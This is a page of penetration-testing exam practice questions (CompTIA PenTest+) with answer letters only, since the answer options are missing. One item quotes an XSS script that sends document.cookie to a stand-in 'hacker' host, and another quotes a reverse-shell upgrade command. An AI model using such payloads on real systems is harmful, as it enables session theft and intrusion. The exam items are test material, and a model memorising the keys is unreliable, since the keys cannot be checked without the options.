Free CompTIA PenTest+ Certification Exam PT0-002 Exam Practice Test

UNLOCK FULL
PT0-002 Exam Features
In Just $59 You can Access
  • All Official Question Types
  • Interactive Web-Based Practice Test Software
  • No Installation or 3rd Party Software Required
  • Customize your practice sessions (Free Demo)
  • 24/7 Customer Support
Page: 1 / 89
Total Questions: 445
  • A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

    Answer: C Next Question
  • A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:python -c 'import pty; pty.spawn('/bin/bash')'Which of the following actions Is the penetration tester performing?

    Answer: B Next Question
  • A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

    Answer: D Next Question
  • A compliance-based penetration test is primarily concerned with:

    Answer: C Next Question
  • A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?

    Answer: C Next Question
  • A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

    Answer: C, D Next Question
  • A penetration tester is performing an assessment against a customer's web application that is hosted in a major cloud provider's environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization's WAF. Which of the following attacks would be most likely to succeed?

    Answer: D Next Question
  • During enumeration, a red team discovered that an external web server was frequented by employees. After compromising the server, which of the following attacks would best support ------------company systems?

    Answer: C Next Question
  • Given the following code:<SCRIPT>var+img=new+Image();img.src=''http://hacker/%20+%20document.cookie;</SCRIPT>Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

    Answer: C, E Next Question
  • A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

    Answer: B Next Question
Page: 1 / 89
Total Questions: 445